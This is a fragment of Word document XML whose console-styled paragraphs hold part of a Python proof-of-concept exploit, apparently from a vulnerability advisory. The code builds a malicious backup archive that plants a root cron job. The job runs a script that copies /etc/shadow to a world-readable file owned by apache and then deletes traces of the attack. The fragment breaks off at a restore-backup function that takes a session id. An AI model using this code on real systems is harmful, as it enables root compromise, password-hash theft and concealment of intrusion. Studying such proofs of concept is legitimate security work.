          <w:p w14:paraId="0EFA74AE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "./",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="395B0177" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73540C4B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["rm", "-rf", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A687FD2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["tar", "-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpzf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/mal_backup.tar.gz", "-C", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>"./</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FC8EC2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["rm", "-rf", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FD5882" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56393743" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C09DC7B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mal_cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515C3E0A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["SHELL=/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "HOME=/", 'MAILTO=""', "* * * * * root /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "", ""]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC4DA13" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CEEFFF1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07DD8FC1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc_script</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E0925D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175BDCEB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>bin/bash",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A36E2C3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "cp /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A61FF0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 777 /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E2436DF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chown</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>apache:apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E59C615" w14:textId="77777777" w:rsidR="00D61684" w:rsidRPr="009A383C" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>rm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve"> -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7510C886" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r w:rsidRPr="009A383C">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:t>"rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE9C607" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Utility_Services_Backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>*",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="665EAC12" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/mal_backup.tar.gz",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58FC0AD9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/stage*",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58391EA4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2259646E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6E842F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD1F011" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF392B7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27506ED1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B816F9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        # Attempt to clean-up previous runs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5856407F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(["rm", "-rf", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/mal_backup.tar.gz"]).wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF53381" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    except:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC5E73A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F449694" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15518502" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pre_commands</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73685E03" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EB9374" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39846E15" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "w") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287FE429" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mal_cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D60CC24" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1584535A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_commands</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107E681C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6CA76D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F5FF5B6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    with </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>open(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "w") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F621D49" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc_script</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620A4F03" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40860998" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "777", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"]).wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="712AEE72" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="170A90A4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B5B958F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>do_restore_backup_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backup_path</w:t>
            </w:r>
